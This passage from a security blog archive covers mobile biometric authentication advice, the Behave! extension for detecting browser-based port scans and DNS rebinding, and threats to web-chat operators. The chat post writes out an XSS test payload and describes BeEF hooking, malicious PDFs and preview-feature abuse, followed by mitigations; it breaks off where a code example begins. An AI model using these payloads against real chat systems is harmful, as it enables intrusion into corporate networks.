the device passcode could be used as well.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
</div></span>
</div>
</div>
<div><br /></div></div>
<h3 style="text-align: left;">Conclusions</h3>
<div><span id="docs-internal-guid-20c1b1af-7fff-3a21-b39a-a63740a8e677"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When implementing biometric authentication in a mobile application, it is recommended to always use solutions that rely on cryptography and secure hardware, such as the Keystore on Android and the Keychain on iOS.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Event-based authentication implementations should be considered insecure, since they can easily be bypassed on rooted or jailbroken devices by using hooking techniques or tools such as Frida or Objection.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Highly sensitive applications, such as banking or finance-related apps, should always rely on strong implementations when using biometric authentication, and they should delete the sensitive data when the biometric set is changed or completely disabled.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Finally, for sensitive applications it is also suggested to adopt frameworks that enhance their resiliency by detecting rooted/jailbroken devices or attacks that make use of hooking techniques, in order to reduce the risk of being
exploited.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
<h4 style="text-align: left;">References</h4>
<div><span id="docs-internal-guid-e8a76478-7fff-d901-9053-b6ac32d4e580"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Android</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 12pt;"><a href="https://developer.android.com/training/sign-in/biometric-auth" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://developer.android.com/training/sign-in/biometric-auth</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05f-Testing-Local-Authentication.md</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; 
list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt;"><a href="https://source.android.com/security/biometric" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://source.android.com/security/biometric</span></a></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">iOS</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 12pt;"><a href="https://developer.apple.com/documentation/localauthentication/logging_a_user_into_your_app_with_face_id_or_touch_id" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://developer.apple.com/documentation/localauthentication/logging_a_user_into_your_app_with_face_id_or_touch_id</span></a></p></li><li dir="ltr" style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt;"><a 
href="https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md</span></a></p></li></ul><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This article is the result of research through the official Android and iOS developer guides, the OWASP Mobile Security Testing Guide (https://owasp.org/www-project-mobile-security-testing-guide/) and the assessment activities on mobile applications performed by Minded Security’s consultants.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
<div><br /></div>
<h4 style="text-align: left;">Authors</h4>
<div>
<ul style="text-align: left;">
<li>Michele Tumolo </li>
<li>Giuseppe Porcu</li>
</ul>
</div>
Michele Tumolohttp://www.blogger.com/profile/08083704549860162234noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-56588500601102691952020-06-30T08:52:00.001-07:002020-06-30T08:55:22.357-07:00Behave! A monitoring browser extension for pages acting as "bad boi".<h2>
<a href="https://user-images.githubusercontent.com/1196560/84408775-d7e64980-ac0c-11ea-87ed-38da5c38ffc6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://user-images.githubusercontent.com/1196560/84408775-d7e64980-ac0c-11ea-87ed-38da5c38ffc6.png" /></a></h2>
<h3>
Browsing: What Could Go Wrong?</h3>
<div>
<div>
There's so much literature about client side attacks, but most of the focus is usually about classical malware attacks, exploiting software vulnerabilities.</div>
<div>
<br /></div>
<div>
Malicious scripts are executed every day by thousands of people, and most of the time malware, viruses and malvertising try to exploit vulnerabilities or to lure the user into installing software on their own machine, with the intent of staying undetected for as long as possible in order to carry out their criminal business. </div>
<div>
That's what AntiMalware/Virus/[...] are for.</div>
<div>
<br /></div>
<div>
It's the principle of minimum energy: usual malware wants comfortable, smooth, local execution. </div>
</div>
<div>
<div>
<br /></div>
</div>
<div>
<div>
However, there is quite a number of alternative attacks on the client side, with a minimal footprint, that tend to draw less attention and might go unnoticed in several environments.</div>
</div>
<div>
<br /></div>
<div>
<div>
Indeed there's a history of <a href="https://www.forcepoint.com/sites/default/files/resources/files/report-attacking-internal-network-en_0.pdf" target="_blank">such alternative attacks </a>as:</div>
<div>
<ul>
<li><b><a href="https://web.archive.org/web/20060821065413/http://www.spidynamics.com/assets/documents/JSportscan.pdf" target="_blank">Local</a> <a href="https://www.gnucitizen.org/blog/javascript-port-scanner/" target="_blank">Port</a> <a href="https://blog.jeremiahgrossman.com/2006/11/browser-port-scanning-without.html" target="_blank">Scan</a></b>: <i>Impact</i>: Information Gathering which could be used to perform further client side attacks (Malware) or to have a better unique user profile (Advertising/RiskAnalysis).</li>
<li><b><a href="https://www.nccgroup.com/us/our-research/cross-protocol-request-forgery/" target="_blank">Cross Protocol attacks</a></b>: <i>Impact</i>: depending on the protocol, specific features may be abused (e.g. SMTP abuse).</li>
<li><b><a href="https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325" target="_blank">DNS</a> <a href="https://threatpost.com/unpatched-wi-fi-extender-remote-control/156990/" target="_blank">rebinding</a>: </b><i>Impact: SOP bypass resulting in reading sensitive information of internal network servers.</i></li>
</ul>
</div>
<div>
<br /></div>
<div>
which are not news at all. They are, indeed, quite old attacks that are still reliable, and just as difficult for browser vendors to completely "fix", because they abuse core features of the Web ecosystem.</div>
<div>
<br /></div>
</div>
<h3>
Behave! A Monitoring Extension for pages acting as "bad boi"</h3>
<div>
With those attacks in mind, we thought that, by taking advantage of the browser API at the extension layer, a <a href="https://github.com/mindedsecurity/behave" target="_blank">browser extension</a> might help monitor the behavior of HTML pages.</div>
<div>
That's <a href="https://github.com/mindedsecurity/behave" target="_blank">Behave!</a></div>
<div>
Available as an extension for:</div>
<div>
<br />
<ul>
<li>Firefox: <a href="https://addons.mozilla.org/en-US/firefox/addon/behave/">https://addons.mozilla.org/en-US/firefox/addon/behave/</a></li>
<li>Chrome: <a href="https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/">https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/</a></li>
</ul>
</div>
<br />
It monitors and warns if a web page performs any of the following actions:<br />
<br />
<ul>
<li>Browser based Port Scan</li>
<li>Access to Private IPs</li>
<li>DNS Rebinding attacks to Private IPs</li>
</ul>
<div>
Here's Behave! pointing its finger at a malicious page, hosted on the <i><u>at.tack.er</u></i> host, that accesses local IPs:</div>
<br />
<br />
<br />
<a href="https://user-images.githubusercontent.com/1196560/84412872-277a4480-ac10-11ea-8db2-0e8eec9adc21.png" rel="noopener noreferrer" style="box-sizing: border-box; color: #0366d6; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Helvetica, Arial, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji'; font-size: 16px; text-decoration-line: none;" target="_blank"><img alt="image" src="https://user-images.githubusercontent.com/1196560/84412872-277a4480-ac10-11ea-8db2-0e8eec9adc21.png" style="border-style: none; box-sizing: initial; max-width: 100%;" /></a><br />
<div>
<h3>
<span style="color: #24292e;">Behave! Future Plans </span></h3>
<div style="background-color: white; box-sizing: border-box; color: #24292e; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Helvetica, Arial, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji'; font-size: 16px; margin-bottom: 16px;">
There's quite a bunch of stealthy and malicious client-side techniques, abusable at several levels of security, that Behave! might monitor in the future.</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 16px;">
<div style="color: #24292e; font-size: 16px;">
<a href="https://github.com/mindedsecurity/behave/issues" target="_blank">Any idea is welcome, as usual.</a></div>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
<div style="color: #24292e; font-size: 16px;">
<br /></div>
</div>
</div>
Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-26722806089401157292020-05-18T02:59:00.000-07:002020-05-18T02:59:23.787-07:00Remote Working - Web Chats: Threats and countermeasures<h3 style="text-align: justify;">
Introduction</h3>
<div style="text-align: justify;">
<div style="text-align: justify;">
With recent worldwide events, a sharply increasing number of companies are offering remote services to their customers. Even traditional businesses are implementing new features, or pushing the migration of existing ones, to meet the new need for dematerialized human-to-human relationships. </div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Web chats are an example of such trends.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Web chats</h3>
<div style="text-align: justify;">
<div style="text-align: justify;">
Rich-message web chats are a common feature implemented by companies to cope with the need for social distancing while maintaining a close relationship with customers.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
An example of a rich-message web chat would be a graphical widget loaded by web site visitors to establish a chat session with a human operator, with the objective of sharing documents in a multimedia environment: users can share PDF files (e.g. personal documents, scans), video or audio files (e.g. a vocal record of a formal declaration, acceptance of conditions and clauses for contracts, identity recognition) or even unexpected formats, to deal with the abundance of multimedia files offered by end-user environments.</div>
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
To do so, the preview feature plays a crucial role.</div>
</div>
<h4 style="text-align: justify;">
Scenario</h4>
<div>
<div style="text-align: justify;">
As shown below, a typical scenario is a web server exposing chat capabilities, allowing human operators in a trusted network (e.g. a LAN) to interact with remote customers.</div>
<div style="text-align: justify;">
Usually, customers interact with the chat using a common browser over an untrusted network (the Internet, their own device); chat operators interact with customers using a browser or the backoffice component of the web chat, which commonly offers rich features, such as document viewing, session management, multiple channels interaction and capabilities to interact with customers in an "enhanced" manner.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This article will describe several attack vectors from potentially malicious remote customers against targeted chat operators and the software they use to interact with customers: the objective of the described workflows is to attack the trusted internal corporate network.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cXr-4yFOoNKG7uDkzur7Xvx1cjBqRznirKuNRssKVdF9ELVB8Vbm6kxhAmJSTfZy6r1Y1jaWvU6XpNwOgDDPsdt-2559ly-3XgSqcpDGjpNqQjZ7fTIc6P-qG5KTIC7GoHVfKm4BOWs2/s1600/Diagram1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="902" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3cXr-4yFOoNKG7uDkzur7Xvx1cjBqRznirKuNRssKVdF9ELVB8Vbm6kxhAmJSTfZy6r1Y1jaWvU6XpNwOgDDPsdt-2559ly-3XgSqcpDGjpNqQjZ7fTIc6P-qG5KTIC7GoHVfKm4BOWs2/s1600/Diagram1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<h4 style="text-align: justify;">
Rich data exchange interaction</h4>
<div style="text-align: justify;">
<div style="text-align: justify;">
Backoffice chat components try to recognize messages, files and URLs submitted by chat users, with the aim of previewing them or offering operators advanced tools to manipulate data.</div>
<div style="text-align: justify;">
Different recognition approaches are usually in place: parsing file extensions, checking the MIME type of uploaded files, and actually reading the real content of the file prior to supplying it to the operator.</div>
<div style="text-align: justify;">
If the recognition procedure does not thoroughly include a secure implementation of all the mentioned approaches, chat operators and internal resources may be prone to security threats.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Threats</h3>
</div>
<div style="text-align: justify;">
Web chats can accept several file formats, sent by users (e.g. via drag &amp; drop) or by submitting URLs.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
HTML payloads</h4>
<div style="text-align: justify;">
The simplest and best-known attack vector is abusing the HTML parser of web chats:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Customer enters <span style="font-family: 'courier new', 'courier', monospace;"><b>ciao!</b></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Operator sees <b>ciao!</b></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Customer enters <span style="font-family: 'courier new', 'courier', monospace;">&lt;script&gt;alert("XSS!")&lt;/script&gt;</span></div>
<div style="text-align: justify;">
Operator sees:</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7mPA450e6Ih0VbpFF-3yBQPawR8MSIP2oxWXSEDcXH9BV_DV4MfWcN1vYdGMgABlK0hYsLGtDJheoBbsng-G4EHOZzW4hlvzNDLrBisykXxlEcNJolH6QaUYygFPVoRsdUF1ol5VNrfKr/s1600/xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="894" data-original-width="426" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7mPA450e6Ih0VbpFF-3yBQPawR8MSIP2oxWXSEDcXH9BV_DV4MfWcN1vYdGMgABlK0hYsLGtDJheoBbsng-G4EHOZzW4hlvzNDLrBisykXxlEcNJolH6QaUYygFPVoRsdUF1ol5VNrfKr/s640/xss.png" width="304" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Malformed PDF file upload</h4>
<div style="text-align: justify;">
User supplied PDF files can be opened by chat operators in embedded viewers in the backoffice component of the web chat or downloaded on their workstation, within the trusted corporate network.</div>
<div style="text-align: justify;">
Such files can be a vehicle for arbitrary code (e.g. JavaScript or other active code), which can therefore be executed on the chat operator's endpoint, exploiting known vulnerabilities in the browser or in any other software used by operators to view the file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As an example, PDF files can contain dynamic JavaScript code, very similar to how XSS attacks work:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgmtuZVLfA14OSmh2BqrPfOjtG8JpCZCPdSrGJK6fZQOBvY1pNzABQUPVJjPOsfjvqS0fI8VmmjaCZOSlFdPSQZotzR2W80wWoQJyK6w3vQlv_mh4KSfc3dld5MOrYuVHhwZ0ysxr_ynEF/s1600/pdf_dynamic.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1115" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgmtuZVLfA14OSmh2BqrPfOjtG8JpCZCPdSrGJK6fZQOBvY1pNzABQUPVJjPOsfjvqS0fI8VmmjaCZOSlFdPSQZotzR2W80wWoQJyK6w3vQlv_mh4KSfc3dld5MOrYuVHhwZ0ysxr_ynEF/s640/pdf_dynamic.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Thus, malformed PDFs, especially if loaded with an outdated Adobe Acrobat version, can be an attack vector for further exploits (e.g. meterpreter payloads, malware, droppers...) against the internal network, the browser, the operating system or other components in the trusted backoffice environment.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Note</u>: any security concern for PDF files should be extended to Office documents (Word, Excel, PowerPoint), especially if older and/or unhardened versions of Microsoft Office are in use.</div>
<div style="text-align: justify;">
For example, threats may include malware embedded in Office documents or CSV Formula Injection attacks.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
Malicious URLs (Abusing preview feature)</h4>
<div style="text-align: justify;">
Web chats tries to parse URLs pasted by users' messages, with the aim of previewing their content.</div>
<div style="text-align: justify;">
If the parsing procedure is executed correctly, the PDF is previewed by an embedded viewer, and it can therefore lead to scenarios described above.</div>
<div style="text-align: justify;">
If, on the contrary, the parsing procedure is not executed correctly, the preview mechanism (triggered by the mere presence of the ".pdf" string in the URL) can lead to unexpected results.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, if the URL ends with the ".pdf" string, the web chat may attempt to load the preview module on whatever the server returns for that path. As shown below, ".pdf" in the URL does not indicate a real PDF file, but a folder named ".pdf" on an arbitrary web server, so the preview shows the server's directory listing instead of a document.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Content of the attacker's web site:</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">$ ls ./.pdf -1</span></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded</span><span style="font-family: inherit;"> (executable file)</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded.html</span> (malicious HTML file)</div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">minded.pdf</span> (malicious PDF file)</div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace;">$ </span></div>
<div style="text-align: justify;">
<br /></div>
</div>
<br />
<div style="text-align: justify;">
Behaviour of the preview in the chat operator's software:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY1JdERJoEVExDtiaQAYbthq2M8Kvm16HBMhdqQdXSybzmBZ1v02pwD1H7Rygv0-L85K8XJnwmQzY3h-j8ICeDAtOVVudgYIzeg6RMlL0jmzwycKO0NrGwVUZqRryJr56rQej_CM4_zGi/s1600/directory_listing1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="772" data-original-width="732" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOY1JdERJoEVExDtiaQAYbthq2M8Kvm16HBMhdqQdXSybzmBZ1v02pwD1H7Rygv0-L85K8XJnwmQzY3h-j8ICeDAtOVVudgYIzeg6RMlL0jmzwycKO0NrGwVUZqRryJr56rQej_CM4_zGi/s640/directory_listing1.png" width="604" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Several social engineering scenarios can be built on this behaviour, for example convincing the chat operator (whose job is to interact efficiently with the customer) to download other files.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Semi-automatic scenarios, on the other hand, can include the execution of arbitrary JavaScript from HTML files, abusing the preview feature. For example, it would be possible to serve a BeEF hook to the browser used by the chat operator:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8VDVtUw_BVcqfwqqU038-gSrubBe9tTIzu40oh7ZX3BBsDI0dtV9-nTEe_qoUZhRUFv12CxSYtNszEIVXfqL08OeXoCGU5P2phjpHAQC49NZMLAX5AEgesnEl3WIo5k9vWeL-bZowhou/s1600/pdf_active_BEEF1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="742" data-original-width="718" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8VDVtUw_BVcqfwqqU038-gSrubBe9tTIzu40oh7ZX3BBsDI0dtV9-nTEe_qoUZhRUFv12CxSYtNszEIVXfqL08OeXoCGU5P2phjpHAQC49NZMLAX5AEgesnEl3WIo5k9vWeL-bZowhou/s640/pdf_active_BEEF1.png" width="618" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The command & control server (used by the attacker / evil customer) would look similar to the following:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrxn9se6Ph9khh_JOiXg0tzUpMNglTZ0QoZgpM10kZGvvJLn-0rgOEXc6HHVLTUJO7OjaoHOGlJHEz5HoJgImiu7UHdw8VOGe_IkZhsv8mCeN96bjn9Swgx6eiyTq7TSddACXPZ_i0jOS/s1600/pdf_active_beef2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="374" data-original-width="941" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRrxn9se6Ph9khh_JOiXg0tzUpMNglTZ0QoZgpM10kZGvvJLn-0rgOEXc6HHVLTUJO7OjaoHOGlJHEz5HoJgImiu7UHdw8VOGe_IkZhsv8mCeN96bjn9Swgx6eiyTq7TSddACXPZ_i0jOS/s1600/pdf_active_beef2.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<span style="font-weight: normal;">Consequently, the attacker can use a wide range of social engineering / hijacking techniques.</span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;">For example, spawning fake system messages / Java Applet load requests:</span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid4D5AH6Udstu2qbmorw3WyRNOyMZmxuWAbXNY5XCQQzB03Qzs2obt0P6jxxhog2zrmL5sXpbiPHKSEnbaL9TQr3Omj2V1xMqLN3_HZ4Q7pk7FqgglZ-3j8Ilfm1fQ_6xJHBZfh7u_R1Qm/s1600/arbitrary_content3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="773" data-original-width="740" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid4D5AH6Udstu2qbmorw3WyRNOyMZmxuWAbXNY5XCQQzB03Qzs2obt0P6jxxhog2zrmL5sXpbiPHKSEnbaL9TQr3Omj2V1xMqLN3_HZ4Q7pk7FqgglZ-3j8Ilfm1fQ_6xJHBZfh7u_R1Qm/s640/arbitrary_content3.png" width="612" /></a></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div>
<div style="text-align: justify;">
Or even spawning fake Clippy Office Assistants:</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwg8qOW3FSeGV-Eno-9QQJVkFGukQnspZTYROC7l6h8aJqbUVOQ3l1pqaRlIe3kz89qrJwEwLuQA_px3OLqOgMBCDdQITjGtLesNigkldRl_HQQDCrHRH-LJrxBqO3Ldi-k8xLHeMS3PuD/s1600/arbitrary_content.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="772" data-original-width="718" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwg8qOW3FSeGV-Eno-9QQJVkFGukQnspZTYROC7l6h8aJqbUVOQ3l1pqaRlIe3kz89qrJwEwLuQA_px3OLqOgMBCDdQITjGtLesNigkldRl_HQQDCrHRH-LJrxBqO3Ldi-k8xLHeMS3PuD/s640/arbitrary_content.png" width="594" /></a></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
<br /></div>
<div>
<h4 style="text-align: justify;">
Embedded players</h4>
<div style="text-align: justify;">
Web chats may also include MP3 players which, depending on the library used by the chat software, may be prone to vulnerabilities in outdated software modules.</div>
<div style="text-align: justify;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuRymM6eJk66tic92-NT9XtuNa2CW49-HgRRWMlJwMosVE2x1B8NrlCIy0DmNgWJN6HlbJvZE7_KTJR0okrSDLLlrezKPnr-rUhkxDEWXZCqvGOGnSL4tF8MmgP3vxqgV-TO8C1SUu63Yb/s1600/mp3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="132" data-original-width="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuRymM6eJk66tic92-NT9XtuNa2CW49-HgRRWMlJwMosVE2x1B8NrlCIy0DmNgWJN6HlbJvZE7_KTJR0okrSDLLlrezKPnr-rUhkxDEWXZCqvGOGnSL4tF8MmgP3vxqgV-TO8C1SUu63Yb/s1600/mp3.png" /></a></div>
<div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Mitigations</h3>
<div style="text-align: justify;">
<ul>
<li style="text-align: justify;">Validate any uploaded file against a predefined list of expected file types, checking all of the following:
<ul>
<li>extension;</li>
<li>declared Content-Type;</li>
<li>actual content of the file (signature bytes and structure).</li>
</ul>
</li>
<li style="text-align: justify;">Re-encode any multimedia file (e.g. resize images at a 1:1 ratio) before allowing chat operators to open it, in order to strip metadata and any embedded content.</li>
<li style="text-align: justify;">Apply proper hardening procedures to any software used by chat operators:
<ul>
<li>update PDF viewer software to the latest available version;</li>
<li>apply the relevant security options (e.g. Enhanced Security and Protected Mode in Adobe Acrobat) to harden the PDF viewer.</li>
</ul>
</li>
<li style="text-align: justify;">Define an allowlist of file types for the preview feature and refuse everything else: if chat operators are expected to receive only URLs, documents and images, allow only PDFs and JPGs/PNGs and <i>exclude</i> any other extension from the previewing components. Base that decision on the parsed URL path and on the fetched content, not on the presence of a ".pdf" substring in the URL.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
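<div style="text-align: justify;">
Both the preview abuse described in the "Malicious URLs" section above (a preview module selected because ".pdf" appears somewhere in the URL) and the validation points in the mitigations list come down to the same two checks. The following Node.js snippet is an added example written for this page, not code from the original post or from any chat product; the function names, the <i>evil.example</i> / <i>docs.example</i> hosts and the sample files are all constructed for illustration. It shows the substring check beside a strict one that parses the URL and allowlists the extension of the last path segment, and an upload gate that requires the extension, the declared Content-Type and the file's leading bytes to agree on one allowlisted type:</div>

```javascript
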